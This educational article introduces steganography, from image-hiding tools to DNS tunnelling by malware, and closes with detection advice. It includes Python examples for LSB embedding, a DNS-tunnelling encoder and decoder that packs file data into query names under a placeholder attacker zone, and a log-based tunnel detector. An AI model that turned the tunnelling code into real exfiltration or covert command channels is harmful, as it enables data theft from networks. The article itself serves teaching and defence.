Cryptography, which includes steganography, is a particular interest of mine. While most of the introductory ciphers are still useful for understanding the fundamentals, the mathematics involved in modern cryptography lends it more towards advanced courses and specialists.
I didn’t think it was worthwhile going into the Caesar cipher, or the mechanics of the Enigma machine, in this article, but steganography is still very relevant today and is the hardest form of cryptography to detect and crack computationally.
What is steganography?
Cryptography derives from kryptos (hidden, or secret) and graphein (writing). It includes a whole host of techniques, and one which stands out is steganography, which comes from steganos, or covered. What makes steganography unique is that it is a technique for making information hard to find, not hard to read once found. There’s a common phrase in cyber security, ‘security by obscurity is no security at all’, and the concept goes back to 1851. Steganography challenges that idea by providing security only through obscurity, which is why in practice the hidden payload is almost always encrypted as well: discovery should not mean disclosure.
Steganography is not so much a single technique as a family of them, with new ones being added all the time. All of the techniques share one core concept: trying to hide a message. I’ve heard compelling arguments that Renaissance artists using symbolism in their works were practising a form of steganography, and ideas like the language of flowers go back centuries. When children draw stick figures using semaphore as secret messages to each other, they are practising steganography.
Modern steganography is dramatically more practical, and usually a lot more malicious, and comes in a few fundamental forms. It is used for malware command and control, data exfiltration, and the exchange of illicit information and material. If you do not know where to look, or what to look for, it is frighteningly hard to detect. When the hidden message is also properly encrypted, there is very little that can be done even once it is found.
Steganographic messages can be hidden in audio, video, or images with simple, free tools that anyone can download and run on a mobile phone. It is an inefficient method, as the carrier must be significantly larger than the hidden message (hiding one bit in the least significant bit of each sample, the most common approach, needs roughly eight bytes of cover for every byte hidden), but in today’s high-bandwidth world of social media that inefficiency is not an issue. A steganographic message for exfiltration of data can also be hidden by tunnelling one protocol through another. A popular method is the use of domain name system (DNS) queries, which almost all firewalls allow, to exfiltrate data or to carry command and control messages to an existing infection. As the internet as we know it relies almost completely on DNS to work, blocking it is challenging. Methods do exist to detect and protect against this vector, but they are hardly ever deployed.
First, we’ll look at the more human side, by embedding messages into media files.
Steganography Tools
One of the best ways to understand the human side of steganography is to try out some steganography tools. Steghide is one open-source command-line tool that will embed a message in a JPEG or BMP image, or a WAV or AU audio file, protected by a passphrase: the payload is compressed and encrypted with a key derived from the passphrase before it is embedded, so a recovered payload is still useless without it. At the recipient end, or on your own system, you can extract the data equally easily with the same passphrase. Pixelknot for Android, and Pictography for iPhone, are similar smartphone-based systems.
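To make the mechanics concrete, here is a minimal least-significant-bit (LSB) embedder and extractor in Python. This is an added example written for this article, not Steghide’s or Pixelknot’s code. The carrier is a constructed buffer of pseudo-random 8-bit samples standing in for the pixels or audio samples of a real cover file (a real tool would read them out of a BMP or WAV and write them back), and unlike Steghide it applies no encryption, so the hidden text is readable by anyone who knows where to look. It also shows the 8:1 cover-to-payload overhead mentioned above and that no sample changes by more than one unit.

```python
import random
import struct

HEADER = struct.Struct(">I")  # 4-byte big-endian payload length, embedded first


def make_carrier(n_samples: int, seed: int = 1) -> bytearray:
    """Constructed cover data: n_samples deterministic pseudo-random 8-bit samples."""
    rng = random.Random(seed)
    return bytearray(rng.randrange(256) for _ in range(n_samples))


def capacity_bytes(carrier: bytes) -> int:
    """One hidden bit per cover sample, minus the length header: the roughly
    8:1 cover-to-payload ratio that makes the method inefficient."""
    return len(carrier) // 8 - HEADER.size


def embed(carrier: bytes, payload: bytes) -> bytearray:
    """Overwrite the LSB of successive samples with the header and payload bits."""
    cap = capacity_bytes(carrier)
    if len(payload) > cap:
        raise ValueError(f"payload of {len(payload)} bytes exceeds capacity of {cap} bytes")
    stego = bytearray(carrier)
    i = 0
    for byte in HEADER.pack(len(payload)) + payload:
        for shift in range(7, -1, -1):            # most significant bit first
            stego[i] = (stego[i] & 0xFE) | ((byte >> shift) & 1)
            i += 1
    return stego


def _read_bytes(stego: bytes, start: int, count: int) -> bytes:
    """Reassemble count bytes from the LSBs of samples beginning at index start."""
    out = bytearray()
    for b in range(count):
        value = 0
        for k in range(8):
            value = (value << 1) | (stego[start + (b * 8) + k] & 1)
        out.append(value)
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read the length header, then that many payload bytes."""
    (length,) = HEADER.unpack(_read_bytes(stego, 0, HEADER.size))
    if length > capacity_bytes(stego):
        raise ValueError("length header is implausible: not a buffer produced by embed()")
    return _read_bytes(stego, HEADER.size * 8, length)


def max_sample_change(carrier: bytes, stego: bytes) -> int:
    """Largest per-sample difference; LSB embedding never changes a sample by more than 1."""
    return max(abs(a - b) for a, b in zip(carrier, stego))


if __name__ == "__main__":
    cover = make_carrier(4096)
    secret = b"meet at the usual place, 0600"
    stego = embed(cover, secret)
    print("capacity:", capacity_bytes(cover), "bytes")
    print("recovered:", extract(stego))
    print("max sample change:", max_sample_change(cover, stego))
```

The same change of at most one unit per sample is what makes LSB embedding invisible to the eye or ear, and also what statistical steganalysis looks for: the LSB plane of an unmodified photograph is not uniformly random, and an embedded payload makes it more so.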
While steganography does have a sinister side, the difficulty of detecting it also makes it highly suitable for a lot of benevolent purposes. Any time someone is under electronic surveillance, if they have an established pattern of activity including social media postings, and a previously agreed protocol with the recipient, uploading a selfie with a steganographically encoded message is a simple, fairly secure, and quick way to communicate. This has been used in practice across the world, including for journalistic reporting from areas with surveillance-heavy authorities. In fact, Pixelknot, the Android steganography tool, was developed by the Guardian Project as part of their mission to support activists, journalists, and humanitarian organisations.
Malware and Steganography
One of the biggest problems for sophisticated malware is communications. It is when reaching out to, or receiving messages from, command and control (C2) systems that malware infections are easiest to detect and at their most vulnerable to disruption. Many of the largest botnets taken down have been disrupted in exactly this way, with defenders identifying the method used to contact the C2 infrastructure and either compromising it in turn (then sending out a self-destruct message, which is not as cinematic as it sounds), or breaking it through other means, such as sinkholing the domains the malware contacts.
The most sophisticated modern malware makes heavy use of steganography not just for C2 purposes; it is also used to exfiltrate bulk data. The C2 side can vary from social media postings (Twitter is fairly popular for this, and I suspect there will be campaigns picked up on Instagram before long) through to tunnelling protocols. It’s the tunnelling protocols we’ll take a brief look at now.
Tunnelling Protocols
At a basic level, a tunnelling protocol carries one protocol’s traffic inside another, allowing data to be sent from one network to another; the carried data can in turn be another tunnelling protocol. There are some amusing implementations of this. For example, the underlying protocol that provides most modern networking, TCP/IP, has been implemented over Facebook chat (which gave it very high latency and low reliability), and over carrier pigeon (RFC 1149, IP over avian carriers: high latency, medium reliability, huge bandwidth).
DNS tunnelling is the most common and best known steganographic tunnelling method used by threat actors. DNS resolves domain names to server or service addresses: a client sends its query to a local recursive resolver, which walks the hierarchy of servers until it reaches the authoritative server for the domain, forwarding the query as needed. To use DNS tunnelling an attacker does not need any special relays inside a network; these are all provided as part of the legitimate network infrastructure. All that is needed is a malicious authoritative server for a domain or domains. The infected host then sends queries for that domain, carrying the outbound data encoded in the subdomain labels of the query name (each label is limited to 63 characters and the whole name to 253, so the data is split across many queries, and each name must be unique or a resolver may answer it from cache without ever contacting the attacker). The attacker’s server replies with a return message in the record data of the response, and any networking protocol can be encoded through this exchange. Tools are available for DNS tunnelling not only for data exfiltration, but for instant messaging, video conferencing, and almost any other protocol that is available normally.
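The client and server halves of that exchange, as an added example in Python written for this article rather than taken from any tunnelling tool: the client splits a file into chunks and turns each into a unique query name under the attacker’s zone, and the server reassembles the chunks from the query names it receives, in whatever order they arrive. The zone exfil.example is a placeholder, nothing is sent on the wire, and the name layout (sequence number, session id, base32 payload) is this example’s own convention.

```python
from __future__ import annotations

import base64

DOMAIN = "exfil.example"  # assumed attacker-controlled zone; placeholder, nothing is sent
MAX_LABEL = 63            # DNS label limit (RFC 1035)
MAX_NAME = 253            # practical limit on a full name in text form


def _b32(data: bytes) -> str:
    """Lowercase, unpadded base32: DNS labels are case-insensitive and '=' is not allowed."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(label: str) -> bytes:
    label = label.upper()
    return base64.b32decode(label + "=" * (-len(label) % 8))


def encode_queries(data: bytes, session: int, chunk: int = 30) -> list[str]:
    """Client side. Each chunk becomes one query name:
        <seq>.<session>.<base32 payload>.<DOMAIN>
    30 bytes of data is 48 base32 characters, inside the 63-character label limit.
    The sequence number makes every name unique, so a resolver cannot answer it
    from cache and must contact the authoritative server. A final 'fin' name
    tells the server how many chunks to expect."""
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk)):
        payload = _b32(data[offset:offset + chunk])
        if len(payload) > MAX_LABEL:
            raise ValueError("chunk too large for one label")
        name = f"{seq}.{session:x}.{payload}.{DOMAIN}"
        if len(name) > MAX_NAME:
            raise ValueError("query name too long")
        names.append(name)
    names.append(f"fin.{session:x}.{len(names)}.{DOMAIN}")
    return names


def decode_queries(names: list[str]) -> dict[int, bytes]:
    """Server side. Reassemble each session from whatever queries arrived,
    in whatever order; duplicates (resolver retries) are harmless, and
    sessions still missing chunks are not returned."""
    chunks: dict[int, dict[int, bytes]] = {}
    expected: dict[int, int] = {}
    for name in names:
        if not name.lower().endswith("." + DOMAIN):
            continue                                  # not a query for our zone
        labels = name[: -len(DOMAIN) - 1].lower().split(".")
        try:
            if labels[0] == "fin":
                expected[int(labels[1], 16)] = int(labels[2])
            else:
                seq, session, payload = int(labels[0]), int(labels[1], 16), labels[2]
                chunks.setdefault(session, {})[seq] = _unb32(payload)
        except (ValueError, IndexError):
            continue                                  # malformed: ignore
    out = {}
    for session, parts in chunks.items():
        n = expected.get(session)
        if n is not None and all(i in parts for i in range(n)):
            out[session] = b"".join(parts[i] for i in range(n))
    return out


if __name__ == "__main__":
    import random
    secret = b"account,balance\nacme,1200\n" * 8
    queries = encode_queries(secret, session=0x1A2B)
    print("\n".join(queries[:3]), "...", sep="\n")
    random.Random(0).shuffle(queries)                 # arrival order does not matter
    print(decode_queries(queries)[0x1A2B] == secret)
```

The return channel works the same way in reverse: the server puts its reply in the record data of the response (a TXT record is the usual choice because it carries free-form text), and the client decodes it. Real tools add retransmission, since plain DNS over UDP gives no delivery guarantee.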
In 2016 Infoblox found that 40% of the malicious software they tested made some use of DNS tunnelling, and in the years since this will likely have grown as open-source and off-the-shelf toolkits have become available. Highly sophisticated attacks, including ones suspected to be sponsored by nation states, use DNS tunnelling for data exfiltration and C2.
It is perfectly possible to detect and/or prevent DNS tunnelling. Tunnelled traffic stands out once you look for it: large numbers of unique, long, high-entropy subdomains under a single domain, unusual record types such as TXT or NULL, and query volumes far beyond what name resolution needs, all of which resolver logs will show if they are kept. Prevention is a matter of forcing all internal hosts to resolve through a resolver you control, blocking direct outbound port 53, and filtering that resolver’s traffic. Yet it is part of the suite of cyber security hygiene measures that are very rarely implemented due to lack of resources, lack of funds, lack of awareness, or a combination of the three.
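What that detection looks like in practice, as an added example written for this article and not taken from any product: a few lines of Python that group resolver log entries by client and zone and flag groups with many distinct, long, high-entropy subdomains. The four-field log format, the thresholds, and the sample log (one host doing ordinary lookups, one sending tunnel-style queries) are all constructed for the example; registered domains are approximated as the last two labels, where a real deployment would use the Public Suffix List.

```python
from __future__ import annotations

import math
import random
from collections import defaultdict


def entropy(s: str) -> float:
    """Shannon entropy in bits per character of a string."""
    if not s:
        return 0.0
    counts: dict[str, int] = {}
    for c in s:
        counts[c] = counts.get(c, 0) + 1
    n = len(s)
    return -sum(k / n * math.log2(k / n) for k in counts.values())


def split_name(qname: str) -> tuple[str, str]:
    """Approximate the registered domain as the last two labels (a real deployment
    would use the Public Suffix List) and return (zone, subdomain part)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def analyse(lines: list[str], min_unique: int = 20, min_len: int = 30,
            min_entropy: float = 3.0) -> list[dict]:
    """Group queries by (client, zone) and flag groups that look like tunnels:
    many distinct subdomains that are long and high-entropy. Thresholds are
    illustrative and should be tuned against a real baseline."""
    groups = defaultdict(lambda: {"subs": set(), "len": 0, "ent": 0.0, "n": 0, "txt": 0})
    for line in lines:
        try:
            _ts, client, qname, qtype = line.split()   # constructed format: 4 fields
        except ValueError:
            continue
        zone, sub = split_name(qname)
        g = groups[(client, zone)]
        g["n"] += 1
        g["subs"].add(sub)
        g["len"] += len(sub)
        g["ent"] += entropy(sub)
        if qtype in ("TXT", "NULL"):
            g["txt"] += 1
    alerts = []
    for (client, zone), g in groups.items():
        uniq = len(g["subs"])
        mean_len = g["len"] / g["n"]
        mean_ent = g["ent"] / g["n"]
        if uniq >= min_unique and mean_len >= min_len and mean_ent >= min_entropy:
            alerts.append({"client": client, "zone": zone, "queries": g["n"],
                           "unique_subdomains": uniq, "mean_len": round(mean_len, 1),
                           "mean_entropy": round(mean_ent, 2), "txt_or_null": g["txt"]})
    return alerts


def constructed_log(seed: int = 7) -> list[str]:
    """Constructed resolver log (timestamp client qname qtype): host 10.0.0.5 does
    ordinary lookups, host 10.0.0.9 sends tunnel-style queries under exfil.example."""
    rng = random.Random(seed)
    benign = ["www.example.org A", "mail.example.org MX",
              "cdn-static.example.org A", "api.example.net AAAA"]
    alphabet = "abcdefghijklmnopqrstuvwxyz234567"        # base32 alphabet
    lines = []
    for i in range(40):
        lines.append(f"2024-05-01T10:{i:02d}:00Z 10.0.0.5 {rng.choice(benign)}")
        payload = "".join(rng.choice(alphabet) for _ in range(48))
        lines.append(f"2024-05-01T10:{i:02d}:30Z 10.0.0.9 {i}.1a2b.{payload}.exfil.example TXT")
    return lines


if __name__ == "__main__":
    for alert in analyse(constructed_log()):
        print(alert)
```

Only the tunnelling host trips all three conditions; the benign host repeats a handful of short, low-entropy names. Content-delivery networks and some anti-spam lookups also produce long, random-looking subdomains, so in production the rule is best combined with an allow list and a baseline of normal query rates per client.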
Cybersecurity Series: Introduction to Steganography
By: James Bore
James Bore is an independent cybersecurity consultant, speaker, and author with over a decade of experience in the domain. He has worked to secure national mobile networks, financial institutions, start-ups, and one of the largest attractions’ companies in the world, among others. If you would like to get in touch for help with any of the above, please reach out at james@bores.com